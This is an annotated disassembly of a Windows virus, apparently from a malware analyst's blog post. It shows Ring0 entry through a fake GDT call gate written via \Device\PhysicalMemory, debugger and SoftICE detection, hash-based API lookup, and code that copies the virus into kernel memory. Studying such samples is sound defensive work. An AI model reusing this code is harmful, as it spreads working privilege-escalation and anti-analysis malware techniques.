dec ecx ; max_index_value
dec ebx
and bl, 0F8h ; last gdt item offset in the gdt table
lea edi, [eax+ebx] ; last gdt item addr in mem
loc_45388B: ; CODE XREF: .text:00453892j
sub edi, 8
test byte ptr [edi+5], 0Fh
loopne loc_45388B
jnz short loc_4538D9 ; 453A4E
==================================
NOW! EDI - is a reserved gdt item
==================================
nop
nop
nop
nop
add edi, 8 ; the next gdt item for using
lea edx, [ebp+5Eh] ; enter Ring0 with GDT way (call to 453A9C)
nop
nop
nop
lea esi, [ebp-2Bh] ; VIRUS APPEND FAKE CALL GATE : 453A13
nop
nop
nop
====================================
FILL OFFSET FOR VIRUS CALL GATE
====================================
mov [esi], dx
shr edx, 10h
mov [esi+6], dx
====================================
push edi
mov ecx, 2
rep movsd ; insert virus fake gate into gdt
pop edi
mov edx, edi
sub edx, eax
or dl, 3 ; selector for call (edi = index<<3+3)
lea eax, [ebp+0Ch] ; 453A4A
nop
nop
nop
mov [eax+4], dx ; [453A4E] = DX
push eax
push 26h
call dword ptr [ebp+28h] ; Sleep (); //453A66
nop
nop
nop
pop eax
call fword ptr [eax] ; enter Ring0 Game
loc_4538D9: ; CODE XREF: .text:0045384Cj
; .text:00453858j .text:00453878j
; .text:00453894j
push dword ptr [ebp+10h] ; 453A4E
nop
nop
nop
call dword ptr [ebp+3Eh] ; ZwClose 453A7C
nop
nop
nop
xor eax, eax
pop dword ptr fs:[eax] ; remove virus seh handler
add esp, 8
go_run_host: ; CODE XREF: start+1Bj start+56j
; .text:0045382Dj Load_apis+Dj
; Load_apis+24j .text:00453950j
; push_call_module_2+8j
sub ebp, 53A3Eh
add ebp, 3F491h ; Original RVA = 3F491 (EPO = 43F491)
push ebp
retn
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
seh_handler2:
call $+5
pop eax
lea eax, [eax-13h]
push eax
mov eax, [esp+10h]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
Load_apis proc near ; CODE XREF: start+3Ap
pusha
pushf
mov eax, [ebp-64h]
nop
nop
nop
cmp eax, 77E60000h
jnz short go_run_host
call dword ptr [ebp+14h] ; IsDebuggerPresent
nop
nop
nop
or eax, eax
jnz short loc_453934 ; jmp is debugger detected!
; clear eax if your debugger was detected!
nop
nop
nop
nop
call check_softice_in_memory
loc_453934: ; CODE XREF: Load_apis+17j
or eax, eax
jnz short go_run_host
popf
popa
call push_module_name ; LoadLibrary
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
aAdvapi32 db 'advapi32',0
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
push_module_name: ; CODE XREF: Load_apis+28p
call dword ptr [ebp+10h] ; LoadLibrary
nop
nop
nop
or eax, eax
Load_apis endp
jz short go_run_host
mov ebx, eax
lea edi, [ebp+42h] ; 453a80
nop
nop
nop
call seek_module_and_apis ; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
call push_call_module_2
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
aNtdll db 'ntdll',0
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
push_call_module_2 proc near ; CODE XREF: .text:0045395Fp
call dword ptr [ebp+10h]
nop
nop
nop
or eax, eax
jz go_run_host
mov ebx, eax
lea edi, [ebp+2Ch]
nop
nop
nop
call seek_module_and_apis ; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
retn
push_call_module_2 endp
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
check_softice_in_memory proc near ; CODE XREF: Load_apis+1Dp
xor eax, eax
push eax
push 80h
push 3
push eax
inc eax
push eax
add eax, 0Bh
push eax
call push_ntice_string
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
a_Ntice db '//./NTICE',0
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
push_ntice_string: ; CODE XREF: check_softice_in_memory+11p
call dword ptr [ebp+18h]
check_softice_in_memory endp
nop
nop
nop
inc eax
jnz short loc_4539BE
nop
nop
nop
nop
dec eax
push eax
call dword ptr [ebp+1Ch] ; CloseHandle
nop
nop
nop
xor eax, eax
retn
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
loc_4539BE: ; CODE XREF: .text:004539ADj
mov eax, 2
retn
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
add [ecx+4Dh], bl
and [ebx+49h], cl
dec esp
dec esp
and [ecx+4Fh], bl
push ebp
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 1 ;
db 0 ;
db 0 ;
db 0 ;
hKernel32 dd 80400000h
db 90h ;
db 2Ch ; ,
db 0 ;
db 2Eh ; .
db 0 ;
db 32h ; 2
db 46h ; F
db 44h ; D
db 0 ;
db 5Ch ; / ; unicode: /Device/PhysicalMemory
db 0 ;
db 44h ; D
db 0 ;
db 65h ; e
db 0 ;
db 76h ; v
db 0 ;
db 69h ; i
db 0 ;
db 63h ; c
db 0 ;
db 65h ; e
db 0 ;
db 5Ch ; /
db 0 ;
db 50h ; P
db 0 ;
db 68h ; h
db 0 ;
db 79h ; y
db 0 ;
db 73h ; s
db 0 ;
db 69h ; i
db 0 ;
db 63h ; c
db 0 ;
db 61h ; a
db 0 ;
db 6Ch ; l
db 0 ;
db 4Dh ; M
db 0 ;
db 65h ; e
db 0 ;
db 6Dh ; m
db 0 ;
db 6Fh ; o
db 0 ;
db 72h ; r
db 0 ;
db 79h ; y
db 0 ;
===================================
VIRUS APPEND FAKE CALL GATE
===================================
dw 46E7h ; OFFSET LOWORD
dw 8 ; SELECTOR
db 0 ; COUNT
db 0ECh ; P:1; DPL:3; DT:0(SYS/GATE); TYPE:C(386 CALL GATE);
dw 44h ; OFFSET HIWORD
==================================
db 0 ;
db 4 ;
db 0 ;
db 60h ; `
db 3 ;
db 80h ; €
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 2Ah ; *
db 46h ; F
db 44h ; D
db 0 ;
db 40h ; @
db 2 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
============================
db 4Bh ; K
db 45h ; E
db 52h ; R
db 4Eh ; N
db 45h ; E
db 4Ch ; L
db 33h ; 3
db 32h ; 2
============================
kernel32_api_hash_code_table
============================
dw 0F3D5h
dw 1336h
dw 8406h
dw 4873h
dw 0C6C7h
dw 66F4h
dw 837Fh
-------------------------
dw 0 ; separator
=============================
KERNEL32.DLL
=============================
addr_LoadLibraryA dd 6C8h ; later, the dword will be used for
; storing HANDLE of ZwOpenSection
addr_IsDebuggerPresent dd 77E6171Dh
addr_CreateFileA dd 77E6B66Dh
addr_CloseHandle dd 77E676F6h
addr_VirtualAlloc dd 77E67F50h
addr_MapViewOfFile dd 77E6D2D7h
addr_Sleep dd 77E675E0h
=========================
db 6Eh ; n
db 74h ; t
db 64h ; d
db 6Ch ; l
db 6Ch ; l
db 2Eh ; .
db 64h ; d
db 6Ch ; l
=======================
dw 0F092h
dw 0BCC8h
dw 0
ZwOpenSection dd 77F86AD5h
ZwClose dd 77F83763h
==============================
db 41h ; A
db 44h ; D
db 56h ; V
db 41h ; A
db 50h ; P
db 49h ; I
db 33h ; 3
db 32h ; 2
==============================
dw 6313h
dw 0DEA4h
dw 39A9h
dw 0
addr_GetSecurityInfo dd 77DC1B02h
addr_SetSecurityInfo dd 77DC1BA3h
addr_SetEntriesInAclA dd 77D92DB6h
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
==============================
VIRUS_RING0_GAME:
pusha
pushf
cli
call $+5
pop ebp ; ebp = 453AA4
lea edi, [ebp+0A8h] ; 453B4C: "ntoskrnl"
xor edx, edx
mov ebx, 80400000h
mov [edi+20h], edx
nop
nop
nop
call seek_module_and_apis ; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
cmp [edi+20h], edx
nop
nop
nop
jz loc_453B49
cld
mov edx, [edi+24h]
nop
nop
nop
mov edx, [edx+1]
mov eax, [edi+20h]
nop
nop
nop
mov eax, [eax]
mov edi, [eax+edx*4]
mov ecx, [ebp+7Ch]
nop
nop
nop
mov [ecx+5EBh], edi
mov byte ptr [ecx+5FFh], 0
mov ecx, dr0
cmp ecx, 474E4159h ; mask in memory?
jz short loc_453B49
nop
nop
nop
nop
lea edi, [eax+edx*4]
push 4D59h
push 30BEh
nop
push 0
call dword ptr [ebp+0D8h] ; maybe alloc a memory
or eax, eax
jz short loc_453B49
nop
nop
nop
nop
push edi
mov esi, 990000h
push esi
mov edi, esi
lea esi, [ebp-3E1h] ; 4536C3
mov ecx, 5EAh
nop
rep movsb
pop esi
mov edi, eax
push 0BD4h
nop
pop ecx
rep movsb
pop edi
add eax, 5EAh
mov [edi], eax
loc_453B49: ; CODE XREF: .text:00453AC3j
; .text:00453AFAj .text:00453B18j
popf
popa
retf
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
db 6Eh ; n ; ntoskrnl
db 74h ; t
db 6Fh ; o
db 73h ; s
db 6Bh ; k
db 72h ; r
db 6Eh ; n
db 6Ch ; l
dw 927Eh
dw 75D8h
dw 0B063h
dw 9B3Ah
dw 0C12Eh
dw 90F8h
dw 5B5Ah
dw 0F72Eh
dw 70EAh
dw 2B7Ah
dw 0BCC8h
dw 0
dd 8046D7A0h
dd 80400A06h
dd 8040120Ah
dd 804016C6h
dd 8046A6C0h
dd 804A81C6h
dd 804554E5h
dd 8042D8A4h
dd 8040141Ah
dd 8040101Ah
dd 80400986h
dd 0
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
seek_module_and_apis proc near ; CODE XREF: start+26p .text:0045395Ap
; push_call_module_2+16p
; .text:00453AB8p
pusha
pushf
call $+5
pop ebp ; EBP = 453BA3
push ebp
lea eax, [ebp+6Ch] ; seh handler for error: 453C0F
nop
nop
nop
push eax
xor ecx, ecx
push dword ptr fs:[ecx]
mov fs:[ecx], esp ; __try
sub ebx, 10000h
loop_to_seek_pe_module: ; CODE XREF: seek_module_and_apis+31j
; seek_module_and_apis+3Dj
; seek_module_and_apis+53j
; seek_module_and_apis+5Bj
add ebx, 10000h ; ebx = 77E00000h
cmp ebx, 80500000h
ja short hKernel32_found_end
cmp word ptr [ebx], 5A4Dh ; MZ
jnz short loop_to_seek_pe_module
mov eax, [ebx+3Ch]
add eax, ebx
cmp word ptr [eax], 4550h ; PE
jnz short loop_to_seek_pe_module
;==================================
; out:
; eax - PE header pointer
; ebx - hKernel32 (if correct)
;==================================
mov [ebp-1C9h], ebx ; [4539DA] = hKernel32
mov eax, [eax+78h]
add eax, ebx ; eax - Export table rva
mov edx, [eax+0Ch]
add edx, ebx ; edx = DLL Module Name rva
mov ecx, [edi] ; edi -> KERNEL32
;check pe_file_export_name == 'KERNEL32'?
cmp [edx], ecx
jnz short loop_to_seek_pe_module
mov ecx, [edi+4]
cmp [edx+4], ecx
jnz short loop_to_seek_pe_module
;===============================
; out:
; eax - export table rva
; ebx - hKernel32
;===============================
hKernel32_found_end: ; CODE XREF: seek_module_and_apis+2Aj
xor ecx, ecx
pop dword ptr fs:[ecx]
pop esi
pop esi ; esi = 453BA3
; edi = 453A36
add edi, 8 ; edi = 453A3E
;=======================================
; if hKernel32 found, ebx is hInstance,
; else ebx is NULL.
;=======================================
or ebx, ebx
jz short loc_453C0C
call seek_all_api ; input:
; ecx = 0
; esi = 453BA3
; edi = 453A3E
loc_453C0C: ; CODE XREF: seek_module_and_apis+69j
popf
popa
retn
seek_module_and_apis endp
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
seh_handler:
call $+5
pop eax
lea eax, [eax-5Ah]
push eax
mov eax, [esp+10h]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
; input:
; ecx = 0
; esi = 453BA3
; edi = 453A3E
seek_all_api proc near ; CODE XREF: seek_module_and_apis+6Bp
var_4 = dword ptr -4
cld
dec ecx ; ecx = 0xffffffff
push eax
xor eax, eax
repne scasw
not ecx
dec ecx
push ecx ; length
push edi ; 453A4E
rep stosd ; ZeroMemory
pop edi
sub edi, 4
pop ecx
pop eax
eax - export rva table
mov esi, [eax+20h] ; Export function name directory rva
add esi, ebx
mov esi, [esi]
add esi, ebx
xor edx, edx
push ecx
loc_453C47: ; CODE XREF: seek_all_api+5Aj
push ecx
loc_453C48: ; CODE XREF: seek_all_api+3Bj
cmp edx, [eax+18h]
pop ecx
jz short loc_453C82
push ecx
inc edx
push eax
call creat_hash_code_for_api_name ;
; =================================
; input:
; esi - api name
; output:
; eax - hash code for the api
; =================================
push edi ; edi - 453a4a
std
mov ecx, [esp+10h+var_4]
repne scasw ; only match low word hash code
pop edi
pop eax
jnz short loc_453C48
push edx
dec edx
push edi
mov edi, [eax+24h]
add edi, ebx
movzx edx, word ptr [edi+edx*2]
mov edi, [eax+1Ch]
add edi, ebx
mov edx, [edi+edx*4]
add edx, ebx
pop edi
mov [edi+ecx*4+4], edx
pop edx
pop ecx
loop loc_453C47
loc_453C82: ; CODE XREF: seek_all_api+26j
pop ecx
retn
seek_all_api endp
; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
;
; =================================
; input:
; esi - api name
; output:
; eax - hash code for the api
; =================================
creat_hash_code_for_api_name proc near ; CODE XREF: seek_all_api+2Bp
push edx
push 0FFFFFFFFh
pop edx
cld
loc_453C89: ; CODE XREF: creat_hash_code_for_api_name+24j
lodsb
or al, al
jz short loc_453CAA
nop
nop
nop
nop
xor dl, al
mov al, 8
loc_453C96: ; CODE XREF: creat_hash_code_for_api_name+22j
shr edx, 1
jnb short loc_453CA4
nop
nop
nop
nop
xor edx, 59414E47h
loc_453CA4: ; CODE XREF: creat_hash_code_for_api_name+14j
dec al
jnz short loc_453C96
jmp short loc_453C89
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
loc_453CAA: ; CODE XREF: creat_hash_code_for_api_name+8j
xchg eax, edx
pop edx
retn
creat_hash_code_for_api_name endp
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
